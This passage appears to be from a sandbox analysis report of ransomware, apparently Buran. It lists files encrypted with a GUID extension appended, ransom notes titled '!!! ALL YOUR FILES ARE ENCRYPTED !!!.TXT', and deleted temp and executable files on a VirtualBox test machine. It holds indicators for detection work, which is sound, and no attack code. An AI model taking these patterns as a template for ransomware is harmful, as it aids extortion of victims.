  1168. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1169. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf",
  1170. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1171. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf",
  1172. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1173. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf",
  1174. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1175. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip",
  1176. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip.875B149F-7E2C-F9D8-914C-24C48737255D",
  1177. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1178. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties",
  1179. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1180. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties",
  1181. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1182. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties",
  1183. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1184. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties",
  1185. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1186. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties",
  1187. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1188. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties",
  1189. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1190. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties",
  1191. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1192. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties",
  1193. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1194. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties",
  1195. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1196. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties",
  1197. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1198. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties",
  1199. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1200. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties",
  1201. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1202. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif",
  1203. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
  1204. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif",
  1205. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
  1206. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif",
  1207. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
  1208. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif",
  1209. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
  1210. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar",
  1211. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1212. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1213. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar",
  1214. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1215. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar",
  1216. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1217. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar",
  1218. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1219. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar",
  1220. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1221. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar",
  1222. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1223. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index",
  1224. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index.875B149F-7E2C-F9D8-914C-24C48737255D",
  1225. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar",
  1226. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1227. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar",
  1228. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1229. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar",
  1230. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1231. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar",
  1232. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1233. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar",
  1234. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1235. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar",
  1236. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1237. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf",
  1238. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1239. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1240. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf",
  1241. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1242. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf",
  1243. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1244. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf",
  1245. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1246. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf",
  1247. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1248. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf",
  1249. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1250. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf",
  1251. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1252. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf",
  1253. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1254. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties",
  1255. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1256. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1257. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif",
  1258. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
  1259. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif",
  1260. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
  1261. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif",
  1262. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
  1263. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif",
  1264. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
  1265. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif",
  1266. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
  1267. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif",
  1268. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
  1269. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif",
  1270. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
  1271. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc",
  1272. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc.875B149F-7E2C-F9D8-914C-24C48737255D",
  1273. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1274. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc",
  1275. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc.875B149F-7E2C-F9D8-914C-24C48737255D",
  1276. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access",
  1277. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access.875B149F-7E2C-F9D8-914C-24C48737255D",
  1278. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1279. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template",
  1280. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template.875B149F-7E2C-F9D8-914C-24C48737255D",
  1281. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties",
  1282. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
  1283. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template",
  1284. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template.875B149F-7E2C-F9D8-914C-24C48737255D",
  1285. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist",
  1286. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist.875B149F-7E2C-F9D8-914C-24C48737255D",
  1287. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1288. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs",
  1289. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs.875B149F-7E2C-F9D8-914C-24C48737255D",
  1290. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts",
  1291. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts.875B149F-7E2C-F9D8-914C-24C48737255D",
  1292. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy",
  1293. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy.875B149F-7E2C-F9D8-914C-24C48737255D",
  1294. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security",
  1295. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security.875B149F-7E2C-F9D8-914C-24C48737255D",
  1296. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy",
  1297. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy.875B149F-7E2C-F9D8-914C-24C48737255D",
  1298. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\trusted.libraries",
  1299. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar",
  1300. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1301. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1302. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar",
  1303. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1304. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar",
  1305. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1306. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1307. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar",
  1308. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
  1309. "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc",
  1310. "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc.875B149F-7E2C-F9D8-914C-24C48737255D",
  1311. "C:\\Program Files\\Microsoft Office\\Office15\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1312. "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt",
  1313. "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
  1314. "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc",
  1315. "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc.875B149F-7E2C-F9D8-914C-24C48737255D",
  1316. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt",
  1317. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
  1318. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1319. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt",
  1320. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
  1321. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml",
  1322. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
  1323. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml",
  1324. "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
  1325. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf",
  1326. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1327. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1328. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat",
  1329. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
  1330. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat",
  1331. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
  1332. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf",
  1333. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
  1334. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini",
  1335. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini.875B149F-7E2C-F9D8-914C-24C48737255D",
  1336. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml",
  1337. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
  1338. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd",
  1339. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd.875B149F-7E2C-F9D8-914C-24C48737255D",
  1340. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini",
  1341. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini.875B149F-7E2C-F9D8-914C-24C48737255D",
  1342. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd",
  1343. "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd.875B149F-7E2C-F9D8-914C-24C48737255D",
  1344. "C:\\Program Files\\Notepad++\\contextMenu.xml",
  1345. "C:\\Program Files\\Notepad++\\contextMenu.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
  1346. "C:\\Program Files\\Notepad++\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
  1347. "C:\\Program Files\\Notepad++\\functionList.xml",
  1348. "C:\\Program Files\\Notepad++\\functionList.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
  1349. "C:\\Program Files\\Notepad++\\langs.model.xml",
  1350. "C:\\Program Files\\Notepad++\\langs.model.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
  1351. "C:\\Program Files\\Notepad++\\LICENSE",
  1352. "C:\\Program Files\\Notepad++\\LICENSE.875B149F-7E2C-F9D8-914C-24C48737255D"
  1353.  
  1354.  
  1355. * Deleted Files:
  1356. "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran",
  1357. "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
  1358. "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe",
  1359. "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
  1360. "C:\\.doc",
  1361. "C:\\.htm",
  1362. "C:\\.jpeg",
  1363. "C:\\.jpg",
  1364. "C:\\.pptx",
  1365. "C:\\.txt",
  1366. "C:\\.xls",
  1367. "C:\\Host.bmp",
  1368. "C:\\Host.docx",
  1369. "C:\\Host.html",
  1370. "C:\\Host.jpeg",
  1371. "C:\\Host.jpg",
  1372. "C:\\Host.pdf",
  1373. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
  1374. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
  1375. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
  1376. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
  1377. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
  1378. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
  1379. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
  1380. "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
  1381. "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
  1382. "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE",
  1383. "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt",
  1384. "C:\\Program Files\\Java\\jre1.8.0_201\\release",
  1385. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt",
  1386. "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt",
  1387. "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html",
  1388. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa",
  1389. "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt",
  1390. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties",
  1391. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties",
  1392. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar",
  1393. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist",
  1394. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties",
  1395. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data",
  1396. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar",
  1397. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties",
  1398. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc",
  1399. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src",
  1400. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties",
  1401. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties",
  1402. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar",
  1403. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar",
  1404. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar",
  1405. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar",
  1406. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar",
  1407. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt",
  1408. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties",
  1409. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar",
  1410. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index",
  1411. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties",
  1412. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar",
  1413. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja",
  1414. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties",
  1415. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar",
  1416. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar",
  1417. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties",
  1418. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat",
  1419. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings",
  1420. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg",
  1421. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf",
  1422. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf",
  1423. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf",
  1424. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf",
  1425. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf",
  1426. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip",
  1427. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties",
  1428. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties",
  1429. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties",
  1430. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties",
  1431. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties",
  1432. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties",
  1433. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties",
  1434. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties",
  1435. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties",
  1436. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties",
  1437. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties",
  1438. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties",
  1439. "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif",
